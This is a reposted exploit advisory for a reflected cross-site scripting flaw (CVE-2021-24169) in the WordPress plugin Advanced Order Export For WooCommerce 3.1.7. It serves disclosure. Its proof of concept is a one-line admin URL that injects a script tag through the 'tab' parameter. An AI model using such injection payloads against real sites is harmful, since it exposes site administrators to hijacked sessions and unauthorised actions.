Cyber Security

WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

Avatar photo

Bybmalandrone

Sep 23, 2021 , , , , , , ,
Authored by 0xB9

WordPress Advanced Order Export For WooCommerce plugin version 3.1.7 suffers from a cross site scripting vulnerability.

advisories | CVE-2021-24169

# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-24169
1. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>

Related posts:

Researchers Discover Critical Vulnerability in PHPFusion CMS
QBot phishing uses Windows Calculator sideloading to infect devices
TikTok Ban Hits EU Commission Phones as Cybersecurity Worries Mount
Atlassian Warns of New Critical Confluence Vulnerability Threatening Data Loss
Cost of a Data Breach Report 2023: Insights, Mitigators and Best Practices

You missed

Bay Area CA Mercury News (news) News Sports

No shot: Stanford women’s basketball routed by Ohio State in San Francisco

Dec 20, 2024 mercurynews.com
Bay Area CA Mercury News (news) News

Jury reaches manslaughter verdict in 2022 fatal assault on elderly South San Jose man

Dec 20, 2024 mercurynews.com
Fox News News

Ravens waive Pro Bowl receiver Diontae Johnson after drama-filled tenure

Dec 20, 2024 foxnews.com
Fox News News

Embattled Illinois mayor declares ‘I am your Rosa Parks’ amid leadership feud

Dec 20, 2024 foxnews.com